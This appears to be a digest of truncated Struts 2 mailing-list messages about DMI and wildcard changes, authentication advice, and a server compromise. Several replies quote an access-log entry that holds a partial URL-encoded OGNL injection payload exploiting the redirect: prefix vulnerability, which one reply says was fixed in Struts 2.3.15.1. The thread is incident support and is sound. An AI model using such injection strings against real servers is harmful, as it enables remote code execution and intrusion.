Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

Code has parent[s] (just like our childrens) that takes special care of it. But code influence (positive or negative) is spread among all people. Open Licenses (like Apache2) code is expecially because let everybody of us to "adopt" or contribute to "a code". Moreover code is developed not only

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

Am 30.01.2014 06:57, schrieb Lukasz Lenart: Do not depend only on container authentication mechanism. So you would discourage the use of like Spring Security as a sole authentication mechanism? Why? Best Fabian smime.p7s Description: S/MIME Cryptographic Signature

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

2014-01-30 Fabian Richter : > Am 30.01.2014 06:57, schrieb Lukasz Lenart: > >> Do not depend only on container authentication mechanism. >> > > So you would discourage the use of like Spring Security as a sole > authentication mechanism? Why? You missed out the context - action: prefix vulnerabili

Re: Regarding latest struts 2.3.x changes and issues with DMI and Wildcards

Thank you very much to all of you for taking the time answer my questions, i have a clearer view of my situation now, Eric: I believe i understand your point , it's best for security related stuff to be taylored for each individual project needs, there's no way to be 100% sure of one's invuln

Security Issues & Vulnerability

I have seen some sample app for testing which was developed using struts2. I saw some unknow files getting uploaded on test, I initially thought that my tomcat was hacked or my server was hacked but now after a close analysis it looks a struts2 webwork secuirty issue or vulenrability or may me my

Re: Security Issues & Vulnerability

What version of Struts are you using? It seems 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.disp

Re: Security Issues & Vulnerability

This is the vulnerability that was addressed in Struts 2.3.15.1. On Thu, Jan 30, 2014 at 2:36 PM, JOSE L MARTINEZ-AVIAL wrote: > What version of Struts are you using? It seems > > 60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET > > /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.